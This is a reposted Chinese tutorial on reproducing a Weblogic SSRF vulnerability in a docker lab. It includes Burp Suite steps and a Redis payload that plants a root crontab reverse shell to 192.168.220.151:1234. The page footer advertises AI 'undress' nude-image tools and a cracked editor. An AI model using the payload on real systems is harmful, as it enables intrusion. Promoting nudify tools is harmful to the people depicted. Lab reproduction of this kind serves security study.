一、使用docker建置環境
docker安裝及建置環境教學:https://www.freebuf.com/sectool/252257.html
存取7001埠
二、漏洞複現步驟
1、漏洞存在頁面/uddiexplorer/SearchPublicRegistries.jsp
#2、檢查一下IBM這個地方看看
發現是個連接,這就可能存在ssrf了
3、使用burp suite抓包,點選Search
4、修改operator參數的連線
5、存取結果
存取不存在的連接埠傳回 could not connect over HTTP
#存取存在的連接埠回傳狀態碼
#存取內網
利用redis反彈shell的payload
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n" config set dir /etc/ config set dbfilename crontab save
以上是如何實現Weblogic SSRF漏洞復現的詳細內容。更多資訊請關注PHP中文網其他相關文章!
陳述
本文轉載於:亿速云。如有侵權,請聯絡admin@php.cn刪除
熱AI工具
Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片
AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。
Undress AI Tool
免費脫衣圖片
Clothoff.io
AI脫衣器
Video Face Swap
使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!
熱門文章
Windows 11 KB5054979中的新功能以及如何解決更新問題
3 週前ByDDD
如何修復KB5055523無法在Windows 11中安裝?
2 週前ByDDD
Inzoi:如何申請學校和大學
4 週前ByDDD
如何修復KB5055518無法在Windows 10中安裝?
2 週前ByDDD
在哪裡可以找到Atomfall中的站點辦公室鑰匙
4 週前ByDDD
熱工具
PhpStorm Mac 版本
最新(2018.2.1 )專業的PHP整合開發工具
EditPlus 中文破解版
體積小,語法高亮,不支援程式碼提示功能
Atom編輯器mac版下載
最受歡迎的的開源編輯器
Dreamweaver CS6
視覺化網頁開發工具
MinGW - Minimalist GNU for Windows
這個專案正在遷移到osdn.net/projects/mingw的過程中,你可以繼續在那裡關注我們。 MinGW:GNU編譯器集合(GCC)的本機Windows移植版本,可自由分發的導入函式庫和用於建置本機Windows應用程式的頭檔;包括對MSVC執行時間的擴展,以支援C99功能。 MinGW的所有軟體都可以在64位元Windows平台上運作。
